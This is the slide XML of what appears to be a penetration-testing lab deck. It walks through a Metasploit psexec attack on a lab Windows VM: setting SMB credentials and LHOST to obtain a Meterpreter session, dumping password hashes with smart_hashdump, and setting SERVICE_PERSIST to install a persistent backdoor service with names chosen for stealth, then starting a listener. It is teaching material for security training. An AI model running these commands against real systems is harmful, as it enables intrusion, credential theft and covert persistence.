              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>SMBUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>IEUser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>msf6 exploit(windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>set LHOST 10.10.0.10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>msf6 exploit(windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64E5E75D-9B52-C147-B0D6-C82299ABF617}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1018810" y="2421698"/>
            <a:ext cx="7227476" cy="2290607"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1232519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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="101553" y="779032"/>
            <a:ext cx="8572840" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="346075" indent="-228600"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Now that we have a Meterpreter session, let's try some basic commands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Check our user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>getuid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Even though we are already System, there still might be some privileges to get</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>There are configurations which can limit system or admin accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Gain more privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>getprivs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Hashdump has been deprecated, replaced with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>smart_hashdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>run post/windows/gather/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>smart_hashdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>You can also see it updated the loot table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Send our session to the background</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>background</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Check our loot table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>msf &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>loot</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>We will attack these hashes in another lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03996029-371C-5746-8063-B011E856FF49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="568655" y="4179754"/>
            <a:ext cx="8171680" cy="775370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{890A8245-CC5B-0249-A676-C72EE3BB8FA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5018879" y="2845822"/>
            <a:ext cx="3987828" cy="17083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274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Placeholder 2"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="51067"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-3175" y="-1588"/>
            <a:ext cx="44831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Persistent Backdoor Service </a:t>
            </a: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99596514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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This next lab will pick up right where we left off</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Still using the psexec exploit, we will dive into more settings and create a persistent backdoor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the VM gets shut down or restarts, we will not need to exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PSExec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> again, we only need to create a listener!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="753077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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>psexec settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287381" y="817733"/>
            <a:ext cx="8572840" cy="3955095"/>
          </a:xfrm>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>By default, after exploit, we can see what process meterpreter is in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>ps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Lists processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>meterpreser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1"/>
              <a:t>getpid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Shows all processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Check out some advanced options of the exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>msf6 exploit(windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>show advanced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Interesting stuff here, including SERVICE_PERSIST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Set it to true</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>msf6 exploit(windows/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>psexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>) &gt; set SERVICE_PERSIST true</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23D6030D-80B6-C144-A14D-A13764D48EDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="376379" y="2374501"/>
            <a:ext cx="8387190" cy="664062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69C85322-0BA0-9145-98B4-37C41BEC0546}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="399979" y="4384049"/>
            <a:ext cx="8387190" cy="544361"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2837150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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>psexec settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>This will create a persistent service on the target machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>By default, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>metaploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> will create the payload with some random characters but we can define the SERVICE names</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Make it more stealthy!</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Set those values to whatever you want for this lab, then exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{849F3DB1-97EA-124B-AEDD-2706E700FEF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="843263" y="1941693"/>
            <a:ext cx="7015947" cy="1260114"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9832FE80-C6A6-1C4D-B6D9-93D86600BCDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="283779" y="3585739"/>
            <a:ext cx="9144000" cy="1272114"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2952390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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>psexec settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Look at the Windows task manager, services tab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{973BB65C-B9FD-AC43-8F3E-6DB4E9E24926}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="255697" y="2455813"/>
            <a:ext cx="5381174" cy="886875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DDCD7FD-C37C-B748-BF45-F7A81F3090C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5817103" y="1363866"/>
            <a:ext cx="2862886" cy="3325791"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3273156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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>psexec settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Even though we created a persistent service to reconnect to us, we need to also create a listener!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set a new exploit, a multi-handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>msf6 &gt; use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set the payload</a:t>
            </a:r>
          </a:p>
          <a:p>
